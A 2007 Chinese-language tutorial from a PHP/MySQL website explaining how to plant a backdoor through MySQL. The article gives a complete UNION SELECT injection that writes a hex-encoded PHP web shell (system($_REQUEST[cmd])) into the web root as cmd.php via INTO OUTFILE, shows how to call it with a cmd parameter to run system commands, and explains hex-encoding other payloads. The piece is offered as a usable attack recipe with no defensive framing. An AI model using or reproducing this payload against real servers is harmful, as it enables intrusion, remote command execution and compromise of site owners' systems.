php开源嘛
首页 | English | MySql数据库 | Php编程 | 建站杂烩 | 系统服务器 | 资源共享 | 专题 | 才桀网 | 支持论坛
  当前位置:主页>MySql数据库>文章内容
Mysql语句生成后门木马的具体方法
来源:网络 作者:未知 发布时间:2007-08-04  

Mysql语句生成后门木马的具体方法

通过Mysql 的语句生成后门木马的方法:phpma.com

          SELECT * FROM `vbb_strikes` WHERE 1 union select
2,3,0x3C3F7068702073797374656D28245F52455155455
3545B636D645D293B3F3E
from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

         通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3 <?php system($_REQUEST[cmd]);?>phpma.com

        再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!phpma.com

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

         答:就是下图代码中的十六进制编码, phpma.com

<?php system($_REQUEST[cmd]);?>

         如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了! phpma.com


(阅读次数:
上一篇:Windows上安装多个Mysql的步骤演示   下一篇:PHP+WAP的中文乱码和操作问题?
[收藏] [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
用户名: 新注册) 密码: 匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论
  热点文章
·用于SELECT和WHERE子句的SQL函数
·MySQL索引分析和优化
·MySQL数据库下.frm .MYD .MYI损
·怎么删除MySQL数据库中的重复数
·MySQL数据导入与导出
·MySQL数据库中SQL查询语句精华
·如何优化MySQL数据库性能
·MySQL查询优化之查询优化器
·怎么备份MySQL数据库
·如何导入导出*.sql文件到MySQL数
·MySQL数据导入导出方法与工具介
·MySQL索引分析和优化加速网站访
  相关文章
·Windows上安装多个Mysql的步骤演
·MySQL学习笔记 实用的操作
·怎样轻松解决MYSQL数据库连接过
·MySQL与各大数据库的对比
·用MYSQL记录记录网站未知错误的
·第一次亲密接触移动数据库:数据
·SQL Server执行SQL语句时内存占
·MySQL查询优化之查询优化器
·SQL Server中盲目地追求一句处理
·建站心得:提高MySQL性能的方法
·MySQL 的数据类型和建库策略
·复制: MySQL 5.1 体验--MySQL

关于我们 | 本站声明 | 友情连接 | 诚邀加盟 | 网站地图
版权Power by DedeCms   技术支持QQ =>> 罗江游鱼   Jacking  后台登陆
Copyright @ 2007 公司地址:柳州市东环路268号 邮编:545006 电话:15920389818 桂ICP备07006725号